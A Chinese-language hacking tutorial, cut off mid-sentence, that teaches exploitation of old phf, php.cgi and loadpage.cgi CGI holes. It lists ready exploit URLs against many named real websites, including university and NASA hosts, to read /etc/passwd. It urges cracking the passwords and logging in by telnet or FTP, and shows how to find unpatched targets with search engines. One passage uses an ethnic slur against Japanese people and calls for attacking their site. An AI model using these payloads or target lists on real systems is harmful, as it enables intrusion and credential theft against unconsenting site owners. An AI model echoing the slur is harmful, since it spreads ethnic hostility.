我的第一篇关于UNIX的教程,我想说的除了找第一个帐号外,还有一个---灵活利用资源。
你也许会感到奇怪,这个"灵活利用资源"和UNIX有什么关系啊?
是的,的确没什么很大的关系。
但这是我的经验介绍。
灵活的利用现有的资源,我们做事才能达到事半功倍的效果。
相信大家都知道那个著名的漏洞吧:phf
漏洞描述: 在NCSA 或者 Apache (1.1.1版本以内)非商业版本的Web Server中有一段程序util.c,允许黑客以root身份执行任何一个指令
http://www.xxx.com/cgi-bin/phf?Qname=root%0Asome%20command%20here
http://www.victim.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
这是四年前的的漏洞了,我们现在还能找到他吗?
答案是: 当然可以!:)
http://www.mohall.k12.nd.us/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
这就是一个。
大家可以看看,没shadow的密码档。 不错吧。依密码档看来,这个网站不是很大。
再看一个。
http://www.grex.org/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
够肥的鸡吧。2395个用户,faint......
大家找个软件慢满跑,小榕的乱刀还挺不错的。
这个漏洞可以直接远程执行命令的哦,详细情况大家看《一次80端口的入侵》这篇文章。
找到用户密码后,你也可以telent或者ftp上去看看哦。
要不干脆黑了它。 不过,我是不会干的。 大家感到奇怪吗? 都什么年代了,还有这个漏洞。 我是怎么找出来的呢?
别急 等一下告诉你。
名字:php.cgi 2.0beta10或更早版本
描述:包括缓存溢出漏洞,还有导致任何系统文件可以被入侵者以nobody权限读取的漏洞。
http://www.victim.com/cgi-bin/php.cgi?/etc/passwd php.cgi2.1版本的只能读shtml文件了. 对于密码文件,同志们要注意一下,也许可能在/etc/master.passwd
/etc/security/passwd等.
这个漏洞大家也很熟悉吧,也很老了。
我们一样可以找到有这个漏洞的主机。
http://hellas.me.ntou.edu.tw/cgi-bin/php.cgi?/etc/passwd
:)一个台湾的家伙。
http://www.pcsc.net/cgi-bin/php.cgi?/etc/passwd
不知道什么网站。
http://www.ccchubu.co.jp/cgi-bin/php.cgi?/etc/passwd
日本鬼子,他妈的,我们冲上去给他们两脚!
大家还要吗?
http://www.lifesupportal.com/cgi-bin/php.cgi?/etc/passwd
http://www.ub.fu-berlin.de/cgi-bin/php.cgi?/etc/passwd
http://www.compfutures.com/cgi-bin/php.cgi?/etc/passwd
http://edu.larc.nasa.gov/cgi-bin/php.cgi?/etc/passwd
http://edu.larc.nasa.gov/cgi-bin/php.cgi?/etc/passwd
这个php.cgi漏洞只能读文件。
我们还是用乱刀来跑密码吧。
找到用户密码后,你也可以telent或者ftp一下哦。
我又是怎么找出来的呢?
别急 等一下告诉你。
名字:loadpage.cgi
描述:可以用来查看任意文件,首先用浏览器找到当前路径,
http://www.example.com/cgi-bin/loadpage.cgi?user_id=1&file=XYZ 这时可能会返回一个错误信息: Cannot open file /home/www/shop/XYZ
现在可以替换为下面的格式,
http://www.example.com/cgi-bin/loadpage.cgi?user_id=1&file=../..//
具体如下:
http://www.example.com/cgi-bin/loadpage.cgi?user_id=1&file=../../etc/passwd
大家看看:
http://www.valueindia.com.au/cgi-bin/loadpage.cgi?user_id=1&file=/../../../../../../../../etc/passwd
哦,他妈的,@#$%@$@#%$!~……
前几天我还可以看到密码档的。
现在可能打上补丁了,或者删掉了,要不就被防火墙过滤了。
我靠,我们来看看另一个。
http://www.bigfivestuff.com/cgi-bin/loadpage.cgi?user_id=1&file=../../etc/passwd
嗯,为什么是500错误?
漏洞手册上是这样的啊。
呵呵
我们要灵活应用嘛,是路径问题。
我们改成:http://www.bigfivestuff.com/cgi-bin/loadpage.cgi?user_id=1&file=/../../etc/passwd
Cannot open file /usr/local/etc/httpd/htdocs/bigfivestuff/store//../../etc/passwd
??
还是路径问题。
我们的路径不够深入。
当前目录是在:/usr/local/etc/httpd/htdocs/bigfivestuff/store/
/../../etc/passwd只向上跳两层。
也就是在/usr/local/etc/httpd/htdocs/
还有五层目录。
我们就添加五层"../"
http://www.bigfivestuff.com/cgi-bin/loadpage.cgi?user_id=1&file=/../../../../../../../etc/passwd
大家看到了吗?
密码档
不过是shadow了的。
我们一样可以用流光生成用户列表然后FTP简单探测。
:)
大家还要吗?
http://qtb.com/cgi-bin/loadpage.cgi?user_id=1&file=../../../../etc/passwd
http://www.bigfivestuff.com/cgi-bin/loadpage.cgi?user_id=1&file=/../../../../../../../../etc/passwd
http://www.cheapcellphones.com/cgi-bin/loadpage.cgi?user_id=1&file=/../../../../../../../../etc/passwd
http://www.boutiquesensuale.net/cgi-bin/loadpage.cgi?user_id=1&file=../../../../etc/passwd
http://www.patches3.com/cgi-bin/loadpage.cgi?user_id=1&file=/../../../../../../../../etc/passwd
http://www.topten.it/cgi-bin/loadpage.cgi?user_id=1&file=/../../../../../../../../etc/passwd
http://www.palmcentre.co.uk/cgi-bin/loadpage.cgi?user_id=1&file=/../../../../../../../../etc/passwd
http://www.storefinder.com/cgi-bin/loadpage.cgi?user_id=1&file=/../../../../../../../../etc/passwd
够你晕了吧
一大堆密码档
我来说说我是怎么找到的吧。
:)我们进入http://www.google.com/
(一个很不错的搜索引擎)
当然你也可以用http://www.yahoo.com
在输入框里我们输入
/cgi-bin/phf
然后回车
我们会发现类似如下内容的页面。
已向英特网搜索/cgi-bin/phf. 共约有7,320项查询结果,这是第1-10项 。搜索用时0.08秒。
类别: Regional North America ... DOE National Laboratories Ames Laboratory
Untitled
lcweb.loc.gov/cgi-bin/phf/ - 类似网页
Untitled
lcweb.loc.gov/cgi-bin/phf - 类似网页
Ames Phone Book - People
类别: Regional North America ... DOE National Laboratories
Ames Laboratory
ph.iastate.edu/cgi-bin/phf - 类似网页
这些网站都有/cgi-bin/phf
也就有可能他们的版本刚好是有上面的漏洞的那个,而没有打补丁!
我们试试http://xxx.xxxxxxxx.xxx/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
不行就试试搜索/cgi-bin/php.cgi /cgi-bin/loadpage.cgi
当然你也可以试其他类似的漏洞。
互连网这么大,总是能找到有的!
但我们这样做太笨了点。
毕竟这不是新漏洞,要找到一个能用的太难了。
但我们为什么不想想?
如果新发现什么漏洞可以直接读取文件或者运行命令的,我们一样可以用搜索引擎来找到有这个漏洞的主机啊。
为什么三年前的漏洞我们还能看到呢?
就象每个人都不一样,当然并不是每个网管都很负责的。:)
还有,如果你有什么漏洞不懂,或者你要找什么资料软件等,也一样可以利用搜索引擎来找!
比如,我们对twwwscan 的扫描结果:Frontpage98 Hole(_vti_inf.html) 不了解,我们就可以在搜索引擎里输入_vti_inf.html,你肯定可以找到很多相关的文章和资料的。
这就是一个小窍门了。:)
因为这些引擎的资料都是用机器人来找的,他是不断更新和添加的。这个机器人不是我们平时听到的什么机器人,他是一个用perl或者其他语言编的网络蠕虫程序,也有人用这些程序来找e-mail地址。OK,我走题了。
我们利用这些引擎,相信大家会找到
